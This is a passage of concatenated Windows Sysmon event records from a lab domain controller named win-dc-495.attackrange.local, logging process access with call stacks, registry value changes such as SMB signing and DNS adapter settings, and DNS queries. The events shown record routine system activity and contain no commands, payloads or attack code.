l+82104|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+82104|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000002770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+82104|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+82104|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+82104|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000002767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+82104|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000002763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.173{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:34:39.141{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\ldapserverintegrityDWORD (0x00000001) 13241300x80000000000000002758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:39.141{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Netlogon\Parameters\requiresignorsealDWORD (0x00000001) 13241300x80000000000000002757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:39.141{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\requiresecuritysignatureDWORD (0x00000001) 13241300x80000000000000002756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:39.141{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\enablesecuritysignatureDWORD (0x00000001) 13241300x80000000000000002755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1101SetValue2021-01-18 13:34:39.126{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001) 22542200x80000000000000002911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.610{59A5CD1D-8E46-6005-1400-00000000A301}1304win-dc-4951460-C:\Windows\System32\svchost.exe 22542200x80000000000000002910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.446{59A5CD1D-8E6F-6005-8100-00000000A301}4548win-dc-495.attackrange.local0fe80::cf6:2edc:f5ff:fef1;2001:0:2851:782c:cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\taskhostw.exe 22542200x80000000000000002909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.445{59A5CD1D-8E56-6005-2E00-00000000A301}246429.220.184.93.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x80000000000000002908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.444{59A5CD1D-8E56-6005-2E00-00000000A301}24642.0.0.10.in-addr.arpa.0type: 12 ip-10-0-0-2.eu-central-1.compute.internal;C:\Windows\sysmon64.exe 22542200x80000000000000002907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.444{59A5CD1D-8E56-6005-2E00-00000000A301}2464173.208.105.51.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x80000000000000002906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.444{59A5CD1D-8E6F-6005-8100-00000000A301}4548localhost0::1;::ffff:127.0.0.1;C:\Windows\System32\taskhostw.exe 13241300x80000000000000002954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000002953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000002952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000002951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000002950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000002949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000002948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000002947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000002946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 
13241300x80000000000000002945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000002944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000002943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.860{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-495 10341000x80000000000000002942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:41.860{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 22542200x80000000000000002941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.634{59A5CD1D-8E44-6005-0B00-00000000A301}856DomainDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.584{59A5CD1D-8E44-6005-0B00-00000000A301}856win-dc-495.attackrange.local010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.584{59A5CD1D-8E44-6005-0B00-00000000A301}856win-dc-495.attackrange.local0fe80::cf6:2edc:f5ff:fef1;2001:0:2851:782c:cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;C:\Windows\System32\lsass.exe 22542200x80000000000000002938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:41.581{59A5CD1D-8E56-6005-2900-00000000A301}2768win-dc-495.attackrange.local0fe80::cf6:2edc:f5ff:fef1;2001:0:2851:782c:cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.532{59A5CD1D-8E56-6005-2E00-00000000A301}24641.f.e.f.f.f.5.f.c.d.e.2.6.f.c.0.c.2.8.7.1.5.8.2.0.0.0.0.1.0.0.2.ip6.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 22542200x80000000000000002936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:40.314{59A5CD1D-8E56-6005-2E00-00000000A301}2464e.f.1.8.f.f.f.f.a.f.2.9.2.8.f.0.6.0.0.2.f.7.3.8.e.0.1.0.0.0.a.0.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x80000000000000002935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:40.282{59A5CD1D-8E56-6005-2E00-00000000A301}24641.f.e.f.f.f.5.f.c.d.e.2.6.f.c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 22542200x80000000000000002934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:40.268{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 13241300x80000000000000002933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.829{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000002932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.829{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 
13241300x80000000000000002931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.829{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 13241300x80000000000000002930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.829{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 10341000x80000000000000002929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 